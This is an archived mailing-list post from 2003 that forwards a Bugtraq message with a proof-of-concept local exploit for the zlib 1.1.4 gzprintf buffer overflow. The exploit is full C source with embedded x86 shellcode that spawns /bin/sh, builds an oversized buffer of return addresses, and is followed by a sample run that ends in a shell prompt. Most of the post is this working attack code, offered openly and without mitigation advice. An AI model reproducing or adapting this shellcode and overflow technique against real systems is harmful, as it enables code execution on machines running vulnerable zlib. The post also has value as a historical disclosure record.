Fw: poc zlib sploit just for fun :)

Niki Guldbrand nikig at vip.cybercity.dk
Wed Feb 26 00:02:15 GMT 2003 


Begin forwarded message:

Date: Sun, 23 Feb 2003 10:38:40 -0800 (PST)
From: Crazy Einstein <crazy_einstein at yahoo.com>
To: bugtraq at securityfocus.com
Subject: poc zlib sploit just for fun :)



/*
\   PoC local exploit for zlib <= 1.1.4
/      just for fun..not for root :)
\
/   Usage: gcc -o zlib zlib.c -lz
\
/   by CrZ [crazy_einstein at yahoo.com] lbyte
[lbyte.void.ru]
*/


#include <zlib.h>
#include <errno.h>
#include <stdio.h>


int main(int argc, char **argv) {
        char shell[]=
                "\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
                "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
                "\xc0\x88\x43\x07\x89\x5b\x08\x89"
                "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
                "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
                "/bin/sh";
        gzFile f;
        int ret;
        long xret;
        char cret[10];
        char badbuff[10000];
        int i;

        sprintf(badbuff,"%p",shell);
        sscanf(badbuff,"0x%x",&xret);

        printf("[>] exploiting...\n");

        if(!(f = gzopen("/dev/null", "w"))) {
                perror("/dev/null");
                exit(1);
        }

        printf("[>] xret = 0x%x\n",xret);

       
sprintf(cret,"%c%c%c%c",(xret&0xff)+4,(xret>>8)&0xff,
                       
(xret>>16)&0xff,(xret>>24)&0xff);

        bzero(badbuff,sizeof(badbuff));

        for(i=0;i<5000;i+=4) strcat(badbuff,cret);

        setuid(0);
        setgid(0);
        ret = gzprintf(stderr, "%s", badbuff );
        setuid(0);
        setgid(0);
        printf(">Sent!..\n");
        printf("gzprintf -> %d\n", ret);
        ret = gzclose(f);
        printf("gzclose -> %d [%d]\n", ret, errno);

        exit(0);
}


[crz at blacksand crz]$ gcc -o zlib zlib.c -lz
[crz at blacksand crz]$ ./zlib
[>] exploiting...
[>] xret = 0xbffff8f0
sh-2.05b$ exit
exit
[crz at blacksand crz]$



__________________________________________________
Do you Yahoo!?
Yahoo! Tax Center - forms, calculators, tips, more
http://taxes.yahoo.com/


-- 
Med Venlig Hilsen / Best Regards
                              |  Teleservice Esbjerg A/S
Niki Guldbrand                |  Salingsundvej 4
IT-Administrator              |  6715 Esbjerg N
                              |  Denmark
Phone         : +45 79144544  |
Direct Phone  : +45 79144589  |  Web : http://www.teleservice.com
Fax           : +45 79144599  |

E-Mail        : Niki.Guldbrand at teleservice.com

--------------
enhance, v.:
	To tamper with an image, usually to its detriment.
--------------

More information about the Lunar-dev mailing list